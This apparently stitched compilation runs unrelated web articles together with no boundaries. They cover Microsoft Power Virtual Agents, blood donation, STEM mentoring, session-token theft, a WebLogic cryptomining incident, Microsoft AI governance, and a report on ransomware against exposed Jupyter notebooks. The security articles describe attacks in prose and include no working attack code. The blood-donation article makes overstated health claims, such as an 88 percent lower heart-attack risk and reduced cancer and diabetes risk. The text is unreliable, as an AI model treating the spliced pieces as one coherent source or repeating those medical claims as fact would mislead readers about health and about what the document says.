By Bryan Timm

What are Microsoft virtual agents? Virtual agents are chatbots that can live on your website and interact with your visitors. Chatbots – also known as "conversational agents" – are applications that mimic written or spoken human speech to simulate a conversation or interaction with a real person. Chatbots are typically offered to visitors in one of two ways: as web-based applications or as standalone apps.

Chatbots are not a new concept – they date back to the 1960s – and as end users and consumers we have been seeing them implemented more and more, on websites and on social media. Gartner estimates that by 2022, 70% of white-collar workers will interact with a chatbot on a daily basis.

Chatbots are AI-powered applications that help companies power conversations. Did you know these chatbots can do more than just chat? Recently, my colleague, Michael Orellana, walked through the Power Platform offerings from Microsoft. One of these, Power Virtual Agents, can be used to empower your employees and automate a variety of tasks.

From a deployment perspective, the biggest problem with chatbots has been the long build process and the extensive development knowledge required to build them. Microsoft Power Virtual Agents introduce a new way to deploy chatbots, using low-code or no-code solutions to produce stunning results. A Virtual Agent can be built to accept full-phrase user input or to present the user with choices that guide them to the end of a process, such as onboarding a new user. The customizable topics – Virtual Agent's version of workflows – can be driven by a variety of Power applications at once, including Virtual Agents, Power Apps, Power BI, and Power Automate. You can connect to over 350 existing connectors and let your chatbot talk to your back-end systems in a few clicks – everything from MailChimp to Salesforce to Zendesk.

There are many ways to use a Virtual Agent. The possibilities of what you can build are nearly limitless, including tools to assist with onboarding, knowledge-base articles, service guides, and reporting. Let's look at these use cases.

Leveraging Power Automate with a connection to Azure Active Directory, a user could initiate a chat with the Virtual Agent and create a new user – all from inside Microsoft Teams. With this Virtual Agent, you can accomplish many of the tasks that come with onboarding a new user, such as creating the new user account, assigning them a Microsoft 365 license, or updating their contact information. These automations can also be built with approvals that automatically reach out to identified stakeholders. There are limitless ways to expand upon this, such as connecting to a SharePoint library for one-click access to send out new-hire documentation.

Have you ever visited a knowledge-base site for a product and been overwhelmed by the amount of information? You're not alone. Imagine having a guided chat with a Virtual Agent that can get you information on a nearly limitless number of topics. This information is mobile, too, through the Microsoft Teams app available on iOS and Android. You can also enable your chatbot to field typical customer service questions, such as business hours, product information, pricing, or collecting information for a quote. An employee in the field would be empowered to be an instant expert with all the information they need at their fingertips, including images, links, or even just step-by-step instructions.
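As a rough sketch of what the onboarding flow described above could call behind the scenes – this is a hypothetical example rather than the Power Automate connector itself, and the tenant, user details, and license SKU below are placeholders – a new Azure AD user can be created and licensed through the Microsoft Graph API:

```python
import requests

GRAPH = "https://graph.microsoft.com/v1.0"
token = "<access token from the flow's Azure AD connection>"  # placeholder
headers = {"Authorization": f"Bearer {token}"}

# Step 1: create the user account (values would be collected by the bot conversation).
new_user = {
    "accountEnabled": True,
    "displayName": "Jordan Example",
    "mailNickname": "jordane",
    "userPrincipalName": "jordane@contoso.com",
    "usageLocation": "US",  # required before a license can be assigned
    "passwordProfile": {"forceChangePasswordNextSignIn": True, "password": "TempP@ssw0rd!"},
}
resp = requests.post(f"{GRAPH}/users", headers=headers, json=new_user, timeout=30)
resp.raise_for_status()
user_id = resp.json()["id"]

# Step 2: assign a Microsoft 365 license (the skuId GUID is a placeholder).
license_body = {
    "addLicenses": [{"skuId": "00000000-0000-0000-0000-000000000000"}],
    "removeLicenses": [],
}
requests.post(f"{GRAPH}/users/{user_id}/assignLicense",
              headers=headers, json=license_body, timeout=30).raise_for_status()

print("Onboarded", new_user["userPrincipalName"])
```

In a real topic, the bot would gather these details as conversation variables and hand them to a Power Automate flow, which performs the equivalent calls through its Azure AD / Microsoft Graph connection.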
Armed with the tools available through a Virtual Agent, a new employee will not feel quite so new when they go on-site to a new client for the first time.

Service teams could leverage a Virtual Agent for other uses as well, such as reporting where they are while on the go. A service technician could check in with the Virtual Agent, and the team manager could use this information to keep track of the team's activities.

Virtual Agents can be linked to several data sources, including Microsoft's Power BI. This allows the agent to take advantage of pre-built reports: the chatbot can ask the user which type of report they want to run and then send it to the user via email. Conversely, you could use a Virtual Agent to input data as well. That data can then be routed automatically to a data source, a SharePoint list, or even just output to an email. Recently, a request came in to query a third-party data source by leveraging its public API. The user can now enter the service tag from the manufacturer into Teams and have it return the warranty status and information. Information from client sites can be captured on the go by enabling a Virtual Agent to route information entered through the Teams mobile app to the appropriate fields in another data store, such as Power BI. Imagine simplifying the inventory process by using a Virtual Agent to collect and update information as you move through your warehouse, store, or even just your garage workspace.

What happens when the Virtual Agent is not able to assist? Build your Virtual Agent to hand off escalations to live agents through Dynamics 365 Omnichannel for Customer Service. Alternatively, you can connect it to a variety of chat providers. It can even pass the information already given to the chatbot along to the live agent. Built-in analytics allow management to view how their chatbot is performing: you can monitor trends across the places where the bot is deployed, identify any areas for improvement, and increase the Virtual Agent's productivity by measuring how well it is doing against survey information.

The San Diego Workforce Partnership utilized Virtual Agents as part of its response to the COVID-19 pandemic. With everything and everyone moving remote, Workforce Partnership employees were able to increase collaboration and engage with more people in need of support. By leveraging a Power Virtual Agent, they were able to make sure people get help from the right person right away.

Creating your first bot requires you to have a license (or trial) for Power Virtual Agents. Agents can be built right inside Microsoft Teams. To get started, you'll need to walk through a few steps in Teams. If this is the first time a bot is being created in your team, you'll see a notice explaining that it will take some time (typically from 1 to 10 minutes). Agents are powered by Topics – pre-built conversations that you can have with the Virtual Agent. Every bot includes a set of default topics, including a path for escalation to a real agent. You can configure the agent to be response-based and look for trigger phrases, keywords, or questions that a user is likely to use, or you can configure it to present preset answers as needed throughout the interaction.
For example, if a user asks "What are your hours?" of a chatbot for a retail organization, and you have a topic configured to respond to the trigger "hours," the bot could respond with your hours and then ask whether they would like a store representative to call them to assist with any questions.

Chat with an expert about your business's technology needs.
Blood Donation - Information & Importance of Blood Donation

History of Blood Donation

The earliest documentation of blood transfusion is found in the religious texts of many civilizations. The first documented demonstration of blood transfusion was between two dogs, performed by Richard Lower in 1665. Karl Landsteiner discovered the ABO blood group system in 1901, one of the most important landmark discoveries in transfusion medicine. In the 1970s, voluntary donors were accepted as blood donors. Some of these donors were later found to be people engaging in high-risk activities, and the recipients were found to be suffering from liver disease. This led to another discovery: hepatitis B could be transmitted by donated blood. Since then, testing for the hepatitis B antigen has been implemented, and this, together with the cessation of paid donation, reduced the incidence of post-transfusion hepatitis. Further studies also led to the inclusion of tests for malaria, syphilis, AIDS, and hepatitis C to make donated blood as safe as possible for the recipient.

What is blood? One can almost say that blood is a magic potion which gives life to another person. Though we have made tremendous discoveries and inventions in science, we are not yet able to make this magic potion called blood. Human blood has no substitute. The requirement for safe blood is increasing, and regular voluntary blood donations are vital for blood transfusion services.

Why donate blood? Someone in the US needs blood every two seconds, so donating blood is a phenomenal way of doing a good deed. More than 41,000 blood donations are needed each day, and because blood cannot be manufactured, the only way to meet this need is through generous blood donors.

Who can donate blood? The eligibility criteria for blood donation are simple. A donor should be between 18 and 55 years of age, weigh 50 kg or more, and have a normal pulse rate, body temperature, and blood pressure. Both men and women can donate blood. There are only a few conditions in which donors are permanently excluded: a history of epilepsy, psychotic disorders, abnormal bleeding tendencies, severe asthma, cardiovascular disorders, or malignancy makes a donor permanently unfit for blood donation. Donors who have had diseases such as hepatitis, malaria, measles, mumps, or syphilis may donate blood after full recovery, with a gap of 3-6 months. People who have undergone surgery or received a blood transfusion may safely donate blood after 6-12 months. Blood is not taken from women donors who are pregnant or lactating, as their iron reserves are already on the lower side.

How much blood can be taken during blood donation? Our body has about 5.5 liters of blood, of which only 350 ml to 450 ml is taken, depending on the weight of the donor. The majority of healthy adults can tolerate the withdrawal of one unit of blood. The withdrawn blood volume is restored within 24 hours, and the hemoglobin and cell components are restored within 2 months. It is therefore safe to donate blood every three months.

What is done with the blood collected? The blood is collected in sterile, pyrogen-free containers with anticoagulants such as CPDA or CPDA with SAGM. This prevents clotting and provides nutrition for the cells. The blood is stored at 2-6°C or at -20°C, depending on the component prepared. Donated blood undergoes various tests, including blood grouping, antibody detection, and screening for infections such as hepatitis, AIDS, malaria, and syphilis, and before it reaches the recipient it undergoes compatibility testing with the recipient's blood.
Modern Blood Transfusion Practice

Modern blood transfusion practice basically deals with the optimal use of one unit of blood. One unit of whole blood is separated into components, making it available to different patients according to their requirements. Thus one unit of blood is converted into packed red cells, fresh frozen plasma, platelet concentrate, cryoprecipitate, and granulocyte concentrate. Another important practice is apheresis: the separation of only the desired component from the donor's blood, with the remaining constituents returned to the donor. This technique is also used therapeutically to remove pathological substances from patients. Withdrawal of blood for transfusion is now regarded as a safe procedure, and the blood donor has emerged as the single most vital link.

Health Benefits of Blood Donation

There are many benefits of blood donation for your health. Some are mentioned below.
- Blood donors have been found to be 88 percent less likely to suffer from a heart attack.
- Donating blood keeps the iron levels in your blood in balance. For each unit of blood donated, you lose about one-quarter of a gram of iron. You may think this is a bad thing, since iron deficiency may lead to fatigue, decreased immunity, or anemia, which can be serious if left untreated, but what many people fail to realize is that too much iron can be worse, and is actually far more common than iron deficiency.
- Repeated blood donations may help your blood flow better, possibly helping to limit damage to the lining of your blood vessels, which should result in fewer arterial blockages.
- Blood donors are less likely to get heart attacks, strokes, and cancers, and people who volunteer for altruistic reasons (to help others rather than themselves) appear to live longer than those who volunteer for more self-centered reasons.
- Repeated blood donations may reduce your risk of getting diabetes.
- The satisfaction that you get after donation cannot be expressed. It can only be felt. It is said that God loves a cheerful giver.
The following post was originally published in The Hill In 1961, President John F. Kennedy laid out an ambitious goal for our nation – to land a man on the moon by the end of the decade. In doing so, he inspired a new generation and helped ensure U.S. global leadership in technology for years to come. Today, we have an earthbound, but no less important, challenge. We face a massive skills gap — by 2018, our nation will have 1.8 million unfilled jobs requiring technical skills. Our nation’s business community is uniting to address the challenge. We need to make sure that students of all backgrounds have the skills and opportunities to pursue a career in STEM– Science, Technology, Engineering, and Math. This requires a national strategy, a chief component of which is STEM mentoring by STEM professionals. Why mentoring? Because students won’t do what they can’t see. It’s one thing to teach math and science in the classroom. It’s another thing to build, explore, and engage the incredible world of science and technology that is transforming our society in real-time. Hands-on learning is the way to get a diverse group of students excited about STEM. Cisco – as a founding member of US2020 – has pledged that 20 percent of our U.S. workforce will participate in STEM mentoring by the year 2020. Over the course of the past two years, we have engaged over 2,500 U.S. employee volunteers who have spent 28,000 hours working with students. The results have been amazing for students and employees. And through a combination of data-driven analysis and anecdotal stories, we have developed 6 keys to engage and energize our executives and employees, to drive STEM mentoring. 1. Make mentoring accessible. If you ask your employees to volunteer at a local school or community-based program, a handful of dedicated individuals will engage. On the other hand, if you bring local students to your facility, and provide volunteers with a sensible agenda and curriculum, the results will be tremendous. More importantly, the students will experience a STEM workplace first-hand and you will help build a culture of engagement, where employees mentor again and again and again. 2. Measure and report impact. The last thing you want is for employees to leave a STEM mentoring engagement without understanding the difference they’ve made. So we’ve made it a practice to survey the students who go through our programs, first when they come in and, later, after they leave. In a recent survey, we asked students, “Do you know what it takes to get a job in STEM?” The initial response was very strong, with over 50 percent indicating agreement. But when asked again after the curriculum was completed, the numbers jumped sky-high — 90 percent indicated agreement. These types of engagement numbers inspire students and employees alike. 3. Tug at the heartstrings and create an emotional connection. Employees will volunteer for a variety of reasons, but we find that sharing stories of engagement – both in terms of students and of mentors makes an enormous difference. “The experience makes me a better father,” one employee told us after he’d spent a few hours connecting with high school students about the possibilities of a career in STEM — science, technology, engineering and math — at a company-sponsored event. He’s one of 82 percent of employees who said they find it personally rewarding to mentor, and 73 percent who said it made them proud to work for our company. 4. Engage senior executives. 
In any company, it is crucial to find executive sponsors who support the mission. This is important for a variety of reasons, not the least of which is that most mentoring programs occur during the workday. For the last major event we held at Cisco, our executive sponsors were the global head of sales, who has now been named the CEO, and the Chief Financial Officer. This sends a very clear signal that mentoring is a business priority, in addition to being the right thing to do.

5. Connect it to your business. As we developed our mentoring curriculum, we linked it to our business priorities. When we engage students, we have a strong focus on engineering, and lay out a skills challenge related to developing new ideas associated with the Internet of Everything. This helps generate excitement and expertise, and leads to more fulfilling engagements for students and employees alike. Each company that engages in STEM mentoring should find its own niche and connection to its business.

6. Partner with effective community organizations. We engage with amazing organizations like the Girl Scouts, Junior Achievement and US FIRST Robotics. They help connect us with local schools and school districts, and are instrumental in bringing students to our campuses. Many companies don't have dedicated staff to drive STEM mentoring, so connecting with the right organizations in the local community is absolutely critical.

STEM mentoring isn't a panacea. It won't solve the skills gap crisis by itself, and it certainly won't do it overnight. But it is a critical piece of a larger STEM strategy that we must embrace. This time it's not about going to the moon. In some ways, it's about something more – opening the eyes of millions of young students to a universe of incredible opportunities.

Kirsten Weeks was a featured speaker at the White House STEM Mentoring Symposium held in Washington, DC, on July 23, 2015.
In the past few years, we have witnessed a significant shift in the attack landscape, from stealing clear text credentials to targeting session-based authentication. This trend is driven by the proliferation of multi-factor authentication (MFA), which makes it harder for attackers to compromise accounts with just passwords. However, MFA is not a silver bullet, and post-authentication materials like session tokens, cookies, API keys and machine certificates can still be exploited to bypass authentication and gain access to sensitive systems and data. In this blog post, I will share some of our red team insights and explain how session-based attacks are evolving beyond the web browser. I will also recommend ways for organizations to protect themselves from these threats and reduce their attack surfaces. What Are Post-Authentication Attacks and Why Are They Dangerous? Post-authentication attacks are a type of attack that targets the authentication tokens that are used to maintain a user’s or a machine’s identity and access rights after the initial login process. These tokens can take various forms, such as cookies, API keys, machine certificates and OAuth tokens. They are often stored in the browser, in files, in memory or in databases and are transmitted over the network when a user or a machine interacts with a web application or an API. The main advantage of session-based attacks for the attackers is that because they happen after the authentication phase and the user is already validated, they can bypass MFA and other security controls applied at the login stage. An attacker can impersonate the user or the machine and access their authorized resources by stealing or forging a valid session token (via the Golden Ticket or Golden SAML attack technique). Moreover, session tokens are often long-lived and have broad privileges, meaning the attacker can maintain persistence and move laterally within the network. How Post-Authentication Threats Are Evolving Amid the Expanding Attack Surface The most well-known and common form of post-authentication attack is cookie stealing, which involves capturing or manipulating the cookies used by web browsers to authenticate users to web applications. Cookies are session tokens issued to the web server after users log in with their credentials and MFA and are stored in the browser. The browser then sends the cookies along with every request to the web server, which validates them and grants access to the user. Cookie stealing can be performed in various ways, such as: - Exploiting vulnerabilities in the web application or the browser, such as cross-site scripting (XSS), cross-site request forgery (CSRF) or XML external entity (XXE) injection, that allow the attacker to execute malicious code or requests on behalf of the user and access their cookies. - Sniffing or intercepting the network traffic between the user and the web server and extracting the cookies from the HTTP headers. This can be done by compromising the user’s device, the web server or any intermediate node on the network, such as a router, a proxy or a firewall. - Accessing the browser’s storage, where the cookies are saved, and copying them to the attacker’s device. This can be done by exploiting the user’s device or by tricking the user into downloading a malicious browser extension, a file or software that can read the browser’s storage. 
- Scraping the browser process memory space. Some cookies are stored as session cookies, which means they are never written to disk and exist only within the browser's memory as ephemeral cookies for the duration of the session, as long as the browser is open. Since browsers are designed to run as unprivileged applications, any other program with the same (unprivileged) level of access can read the browser's memory.

As you can see, cookies are key security material and are actively sought out by threat actors. If you were to eliminate cookies from the browser, the experience would become more secure. And that's no longer a hypothetical scenario, with the arrival of our recently released, identity-centric CyberArk Secure Browser – an industry first (and one our red team helped develop). The browser eliminates the writing of cookies to a device's disk, which means there are no cookies for attackers to steal. By eliminating cookies from the disk, organizations can help protect themselves from certain types of session-based attacks that rely on stealing cookies to bypass the authentication process.

However, cookies are not the only form of session token that session-based attacks can target. As web applications and APIs become more complex and diverse, and as more machines and devices communicate with each other over the internet, other forms of session tokens are emerging and becoming more prevalent. These include:

- API keys, which are secret tokens used to authenticate and authorize machines or programmatic users to access APIs. API keys are often used for programmatic or automated interactions with cloud services, such as spinning up virtual machines, accessing storage buckets or sending notifications. API keys are usually stored in files or databases and transmitted over the network as HTTP headers or parameters.
- Machine certificates, which are digital certificates used to authenticate and authorize the communication between machines or devices. Machine certificates are often used to secure connections between servers, clients and IoT devices, such as VPNs, HTTPS or SSH. Machine certificates are usually stored in files or hardware modules and are transmitted over the network as part of the TLS handshake.
- OAuth tokens, which are tokens used to delegate access to third-party applications or services. OAuth tokens are often used for social login, where a user can sign in to a web application using their existing account from another platform, such as Google, Facebook or X (née Twitter). OAuth tokens are usually stored in the browser or in databases and transmitted over the network as HTTP headers or parameters.

These session tokens are also vulnerable to session-based attacks and can be stolen or forged by attackers in ways similar to cookies. For example:

- API keys can be exposed by vulnerabilities in the API or the client, by network sniffing or interception, or by accessing the files or databases where they are stored.
- Machine certificates can be compromised by vulnerabilities in the TLS protocol or its implementation, by network sniffing or interception, or by accessing the files or hardware modules where they are stored.
- OAuth tokens can be hijacked by vulnerabilities in the OAuth protocol or its implementation, by network sniffing or interception, or by accessing the browser or databases where they are stored.

(A recent example of this is APT29's attack on Microsoft, where the attackers breached a legacy test OAuth application and then created a series of malicious OAuth apps, which enabled them to gain further access. This ultimately allowed the attackers to access certain corporate email accounts.)

How Organizations Can Help Protect Themselves From Post-Authentication Attacks

Post-authentication attacks are a serious and growing threat, and organizations need to take proactive measures to protect themselves and their users from these attacks. Some of the best practices and recommendations that organizations can follow are:

- Implement the principle of least privilege (PoLP) and limit the scope and duration of session tokens. Session tokens should only grant the minimum access rights needed, when needed (just-in-time), for the specific task or interaction, and should expire or be revoked as soon as possible. This can reduce the impact and the risk of session token compromise.
- Enforce strong encryption and integrity checks on the network communication and the session tokens. Session tokens should be encrypted and signed by the issuer and transmitted only over secure channels, such as HTTPS or TLS. This can prevent attackers from sniffing, intercepting or tampering with them.
- Monitor and audit the usage and activity of session tokens. The issuer should log and track session tokens, and any abnormal or suspicious behavior – such as multiple or concurrent logins, unusual locations or devices, or anomalous requests or actions – should be detected and alerted on. This can help organizations identify and respond to session token compromise.
- Educate and train users and developers on the risks and best practices of session token security. Users should be aware of the dangers of phishing, malware and social engineering and avoid clicking on suspicious links, downloading unknown files or sharing their session tokens with anyone. Developers should be familiar with the latest session token security standards and guidelines and follow secure coding and testing practices.
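To make the first two recommendations above concrete, here is a minimal, hypothetical sketch – not CyberArk's implementation – of issuing a short-lived, narrowly scoped, signed session token with the open source PyJWT library; the secret, audience, and scope values are placeholders:

```python
import datetime
import jwt  # PyJWT

SIGNING_KEY = "replace-with-a-strong-secret-or-private-key"  # placeholder

def issue_session_token(user_id: str, scope: list[str]) -> str:
    """Issue a signed token that is narrowly scoped and expires quickly."""
    now = datetime.datetime.now(datetime.timezone.utc)
    claims = {
        "sub": user_id,                                   # who the token represents
        "scope": scope,                                   # only the permissions needed for this task
        "iat": now,
        "exp": now + datetime.timedelta(minutes=15),      # short lifetime limits replay value
        "aud": "example-api",                             # bind the token to one audience
    }
    return jwt.encode(claims, SIGNING_KEY, algorithm="HS256")

def verify_session_token(token: str) -> dict:
    """Reject expired, tampered, or mis-targeted tokens."""
    return jwt.decode(token, SIGNING_KEY, algorithms=["HS256"], audience="example-api")

if __name__ == "__main__":
    t = issue_session_token("alice", scope=["reports:read"])
    print(verify_session_token(t)["scope"])
```

Short expirations and narrow audiences do not prevent token theft, but they shrink the window and the blast radius if a token is captured.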
With attackers relentlessly finding new ways to exploit them, post-authentication attacks are a complex and evolving challenge. Organizations must be prepared and vigilant to defend themselves from these threats by implementing security measures such as least privilege and monitoring, and by maintaining an assume-breach mindset. Additionally, solutions such as CyberArk Secure Browser, which completely eliminates cookies from the disk, can provide an added layer of protection.

Shay Nahari is VP of CyberArk Red Team Services.

Editor's note: For more insights from Shay Nahari on this subject, secure web browsing and beyond, listen to the April 2024 CyberArk Trust Issues podcast episode, "Secure Browsing and Session-Based Threats." The episode is available on most major podcast platforms.
Cybersecurity is a big, scary word with big, scary implications. The word conjures mental images of a dark room and someone in front of a dimly lit computer. The black screen flashes green and is dotted with lines of code entered by a nameless, faceless "cyberterrorist" – a hacker – with a smirk and an evil laugh. Are hackers merely the digital age's version of a pirate ship on the high seas, with the sought-after treasure in the updated form of digital profit? The reality, though, is far scarier: data security is big business, and with every business venture comes big risk.

You've worked hard to get where you are. Your business is growing, and the truth is this makes you a target. Vulnerability is an unfortunate side effect of success, and with it comes fear – fear of losing everything you've built. Hackers spend hours trying to uncover these vulnerabilities and exploit them, sometimes for profit or ransom, or just to cause damage.

How do these hackers do this? Hackers obtain access to a computer and plant "malware" – malicious software, like a virus or another executable program. The purpose of these programs varies, but their shared nature is that they're not meant to help anyone but the hacker. In some cases, the idea is to have this malware operate undetected – but not always.

- One of the most famous hacking collectives today is "Anonymous," an international group that has become well known for DDoS (distributed denial-of-service) attacks on government, religious, and corporate websites.

Every day, hackers are finding new ways to attack, and are sometimes successful simply because those they attack just haven't yet applied available security updates, called patches. A patch is a corrective action to address a specific vulnerability. A critical patch update – a CPU – is a series of patches released at the same time that resolve security vulnerabilities. Often a CPU is released in response to a discovered vulnerability, sometimes with hackers already exploiting the weakness. Organizations will accompany a CPU with a disclosure statement describing these vulnerabilities and the solution within the CPU. No matter the reason, applying a CPU shouldn't be delayed.

For example, Oracle recently released a patch for select products, including its WebLogic Server. Oracle discovered a vulnerability affecting WLS Security that allowed attackers to exploit access, resulting in a successful takeover of the server. For what is considered to be the industry's best application server, with features for lowering operational costs while improving performance, this vulnerability reflects an urgent need for users to update. In Q4 2017, Oracle released a security alert notifying customers of affected Oracle products and strongly advised that the CPU released in October be applied immediately.

- Oracle patch CVE-2017-3506 addressed WebLogic's "Web Services" subcomponent
- Oracle patch CVE-2017-10271 addressed WebLogic's "WLS Security" subcomponent – a critical Java deserialization vulnerability
- Impacted WebLogic versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, or 12.2.1.2.0

More details were not publicly available until December, when Oracle announced that the vulnerability would have allowed unauthorized users to gain remote access and take over the server. How was this discovered? As it turns out, hackers placed a script on affected servers that unintentionally "killed" the servers – prevented them from functioning – possibly even alerting some of the intended targets of the attack before the attack had the chance to deploy fully.
In this specific case, one widely-shared thought is that hackers were exploiting this weakness to install software that mines bitcoins on the affected servers. One element that makes this situation unique is that only limited coding knowledge was needed to make this hacking effort a success if fully and properly deployed. - What is bitcoin mining? Specialized software is used to solve complex math problems in exchange for an amount of bitcoin currency. Why does this matter? If this activity is taking place as a result of a hacker accessing your server, and this hacker now has control of your data, everything is at risk. In most cases, bitcoin mining on a regular computer didn’t allow the generation of enough of the currency to offset the power consumption cost, making this an unappealing option for bitcoin miners. If you read between these lines, hacking someone else’s machine is a better target since the hacker isn’t paying the power bill! Imagine if, instead of just one computer for a single user, you utilize a cloud-based solution for your entire business, and a hacker was able to access your incredibly powerful resource for their benefit – compromising your data. What would be the impact on your business if this data library became lost? What does all of this mean? First, it means we strongly recommend a thorough security review to protect yourself, your business, and your data. Next, it’s vital to remain vigilant after a patch is installed, and investigate further. If one hack attempt is successful, more importantly by a less-sophisticated hacker, then a more skilled “cyberterrorist” is likely in a better position to gain even stronger control over your system. Is there an upside? The good news is that cybersecurity is an increasingly critical component of today’s business model, and the industry is growing – as is the pool of candidates and the knowledge base within. The evolution of cybersecurity is a byproduct of the ever-evolving world of technology, and those organizations that focus on the latest trends and the newest solutions are supporting the strength of the field. - Standards are being established across the technology industry, laws are being written to protect digital and intellectual property, and crimes are being prosecuted. - Precedents are being established with which to fight cyberterrorism and hackers, in numbers great or small. What can you do? The best thing you can do for your business – and thus, yourself – is to employ a top arsenal of experts that can aid you in protection against cyber attacks. Remember that even the best efforts need ongoing support. The key to long-term success is to work with experts that understand your needs and the nature of your business in such a way that there is a seamless relationship: Where you end, your “cybersecurity expert” begins, and eliminates any vulnerabilities. When customers ask you what the secret of your success is, you can honestly answer that you only work with the best – and that’s the best position to be in for the future.
In the last year, artificial intelligence (AI) has become the hot topic in technology and, of course, in our society. It is in the process of transforming the way we work and live. The new era of AI is being compared to significant advancements like the industrial revolution, the introduction of calculators, and the widespread use of the internet. It is not solely focused on technological areas but is permeating the lives of everyone on the planet. We can see the impact on shopping, traveling, search engines, our ever-connected phones, and governments. For the average person, AI has shifted from a complex unknown technology to simply a part of everyday life. For organizations, both in the private and public sectors, visionary leaders are looking to harness AI technology to provide efficiency at orders of magnitude greater than ever thought possible. The challenge, however, is to adopt these capabilities reasonably and in the most economical way.

Arguably, Microsoft, with strategic partnerships like the one with OpenAI, has taken the lead in the era of AI. Microsoft has provided a path for organizations to harness previously extremely expensive and complex AI technology and focus it on their own data and processes. Unlike many of the initial publicly available iterations of generative AI (such as OpenAI's ChatGPT) that promote the democratization of AI engines, Microsoft, within the Cognitive Services area of the Azure public cloud, has empowered organizations to apply the many different types of generative AI (e.g., large language models (LLMs), image synthesis models, etc.) to their own proprietary data.

With this new technology, one of the key concerns within society is the ethical and proper use of AI. In this area, Microsoft has for several years also provided guidance for the era of AI, defining responsible AI utilization with six primary principles:
- Accountability: People should be accountable for AI systems
- Transparency: AI systems should be understandable
- Fairness: AI systems should treat all people fairly
- Reliability and safety: AI systems should perform reliably and safely
- Privacy and security: AI systems should be secure and respect privacy
- Inclusiveness: AI systems should empower everyone and engage people

Additionally, Microsoft has provided guidance and additional tooling for operationalizing the adoption of AI within organizations, both in the public and private sectors. Most recently, Microsoft has provided insight into an upcoming framework – AI Literacy, Governance, and Technology (AGT) – as a guide initially focused on government organizations, but very applicable to private sector organizations as well. Not surprisingly, the Data and AI practice at Planet Technologies, in conjunction with its unique You Already Own It (YAOI) program, has also provided cloud strategy sessions organized along the same lines: AI Literacy, Governance, and Technology. This approach provides the ability for organizations of all types to quickly come up to speed in adopting AI in their strategy and vision. The outline Microsoft provided as a preview on October 1, 2023, aligns closely with the success Planet Technologies has had in assisting key customers in adopting AI within the Azure Cognitive Services umbrella across multiple successful engagements. It is also no surprise that Planet Technologies was designated as a Charter Member of Microsoft's Content AI Partner Program.
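As a small illustration of what applying a hosted model to your own data can look like in practice – a hypothetical sketch, not Planet Technologies' or Microsoft's reference implementation, with the endpoint, key, and deployment name as placeholders – an organization can call its own Azure OpenAI deployment and ground the prompt in its proprietary content:

```python
import os
from openai import AzureOpenAI  # openai>=1.0 Python SDK

# Placeholders: use your own Azure resource endpoint, key, and deployment name.
client = AzureOpenAI(
    azure_endpoint=os.environ["AZURE_OPENAI_ENDPOINT"],
    api_key=os.environ["AZURE_OPENAI_API_KEY"],
    api_version="2024-02-01",
)

# A retrieved snippet of the organization's own data (e.g., from a search index).
context = "Policy 12.4: Contractors must complete security training before badge issuance."

response = client.chat.completions.create(
    model="my-gpt-4o-deployment",  # the name of *your* model deployment
    messages=[
        {"role": "system", "content": "Answer only from the provided context."},
        {"role": "user", "content": f"Context:\n{context}\n\nQuestion: Who must complete security training?"},
    ],
)
print(response.choices[0].message.content)
```

The point relevant to governance is that the model deployment, the keys, and the data all remain inside the organization's own Azure subscription.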
Referring to the preview of the AGT Framework Outline, below are the areas that provide a roadmap for organizations to adopt proprietary AI technologies quickly, efficiently, and properly.

- AI Literacy
  a. Understanding Generative AI
  b. Exploring the Potential and Pitfalls of Generative AI
  c. Assessing Generative AI Outputs
  d. Engaging with Generative AI Systems
  e. Crafting Generative AI Models
  f. Deciphering Generative AI Outputs
  g. Collaborative Creating with Generative AI
- Governance
  a. Policy Framework for Generative AI
  b. Legal Compliance and Ethical Standards
  c. Data Governance
  d. Accountability and Transparency
  e. Risk Management
  f. Performance Monitoring and Evaluation
  g. Public Engagement and Awareness
- Technology
  a. Core Technologies of Generative AI
  b. Infrastructure Essentials
  c. Security, Privacy, and Compliance
  d. Integration and Standardization
  e. Development Environments and Tooling

It is important to note that the actual adoption of AI technology within the organization is listed last, after ensuring that both an understanding of AI and a proper governance structure are in place. Lastly, it is important to realize that we are still on the cusp of understanding all the possible use cases that utilize AI. Transparently, Planet Technologies is seeing and assisting customers with many use cases including, but not limited to, education, secure research, the defense industrial base (DIB), and government. If your organization is looking to explore adopting AI, especially utilizing Microsoft technologies (e.g., Azure OpenAI, Copilot, etc.), Planet is available to review and assist you and your organization.
Team Nautilus has uncovered a Python-based ransomware attack that, for the first time, was targeting Jupyter Notebook, a popular tool used by data practitioners. The attackers gained initial access via misconfigured environments, then ran a ransomware script that encrypts every file on a given path on the server and deletes itself after execution to conceal the attack. Since Jupyter notebooks are used to analyze data and build data models, this attack can lead to significant damage to organizations if these environments aren’t properly backed up. What is Jupyter Notebook? The Jupyter Notebook is an open source web application used by data professionals to work with data, write and execute code, and visualize the results. Normally, access to the online application should be restricted, either with a token or password or by limiting ingress traffic. However, sometimes these notebooks are left exposed to the internet with no authentication means, allowing anyone to easily access the notebook via a web browser. On top of this, a built-in feature of Jupyter notebooks enables the user to open a shell terminal with further access to the server. Breaking down the Jupyter Notebook ransomware attack To conduct the attack, the adversary accessed the server via a misconfigured application, downloaded the libraries and tools that support the attack (for example, encryptors), and then manually created a ransomware script by pasting the Python code and executing the script. Below, you can see the actual code that was used during the attack on our honeypot: Our honeypot was designed to simulate a real-life enterprise environment, so it included actual Jupyter notebooks and raw data files that the attacker could encrypt. The attack stopped before it could cause more damage. We decided to simulate and investigate the attack in our lab. In the screenshot below, you can see the execution of the encryptor. Note that the Python file (cpt.py) was designed to delete itself after execution to conceal the attack. No ransom note was presented in this attack. We assume that either the adversary was experimenting with the attack on our machine, or the honeypot timed out before the attack was completed. Overall, this attack is simple and straightforward, as opposed to more sophisticated ransomware that uses advanced techniques, such as Locky, Ryuk, WannaCry, or ransomware-as-a-service such as GandCrab. We also suspect that we might be familiar with the attacker due to the unique trademark that was used. In the beginning of the attack, the adversary checked if the server was vulnerable by downloading to /tmp directory a text file named f1gl6i6z. This file contains the word ‘bl*t’, which might indicate that the threat actor has Russian origin. We’ve seen this file used before in many cryptomining attacks that target Jupyter notebooks and JupyterLab environments. A quick Shodan query shows that there are about 200 internet-facing Jupyter notebooks with no authentication. Naturally, some of them can be honeypots, but not all. We think that this attack can indicate a campaign that executes ransomware on these servers. Using Tracee to detect the attack Our honeypots are continually monitored by Tracee of Aqua Security, an open source runtime security and forensics tool for Linux, built to address common Linux security issues. On GitHub, you can find Tracee-eBPF, a Linux tracing and forensics tool based on eBPF technology, and Tracee-rules, a runtime security detection engine that allows to detect malicious events. 
